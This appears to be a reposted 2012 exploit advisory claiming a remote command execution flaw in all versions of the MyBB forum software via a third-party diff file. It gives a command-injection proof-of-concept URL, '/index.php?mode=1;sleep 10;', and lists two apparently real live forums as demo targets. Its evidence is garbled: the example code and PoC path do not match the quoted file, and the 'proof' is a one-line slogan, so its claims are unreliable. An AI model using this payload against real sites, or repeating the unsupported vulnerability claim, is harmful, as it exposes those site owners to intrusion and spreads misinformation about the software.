标题: Mybb All Versions Remote Command Execution
作者 : Nafsh
日期: 3 Oct 2012
主页: http://Sec-Lab.Tap-Co.Net
联系方式: Nafsh.Hack@Gmail.com
#########################################################
源码下载 : http://www.mybb.com/download/latest
 
文件:  /inc/3rdparty/diff/Diff/Engine/shell.php
 
Bug 部分源码:  
        $fp = fopen($to_file, 'w');
        fwrite($fp, implode("\n", $to_lines));
        fclose($fp);
        $diff = shell_exec($this->_diffCommand . ' ' . $from_file . ' ' . $to_file);
        unlink($from_file);
        unlink($to_file);
证明:
 
$_GET  +  shell_exec()  =  Command Execution
 
缺陷描述:
 
An attacker might execute arbitrary system commands with this vulnerability. User tainted data is used when creating the command that will be executed on the underlying operating system. This vulnerability can lead to full server compromise.
 
缺陷示例代码:
1: exec("./crypto -mode "  .  $_GET["mode"]);
 
proof of concept :
 
/index.php?mode=1;sleep 10;
 
补丁: www.2cto.com
 
Limit the code to a very strict character subset or build a whitelist of allowed commands. Do not try to filter for evil commands. Try to avoid the usage of system command executing functions if possible.
 
1: $modes  =  array("r",  "w",  "a");  if(!in_array($_GET["mode"],  $modes)) exit ; 
r

D3m0 : 
 
http://www.minuteworkers.com/forum/inc/3rdparty/diff/Diff/Engine/shell.php?Find It In Source=RCE
 
http://www.artistsuniverse.org/forum/inc/3rdparty/diff/Diff/Engine/shell.php?Find It In Source=RCE
#########################################################
We are : K0242 | Nafsh | Ehram.shahmohamadi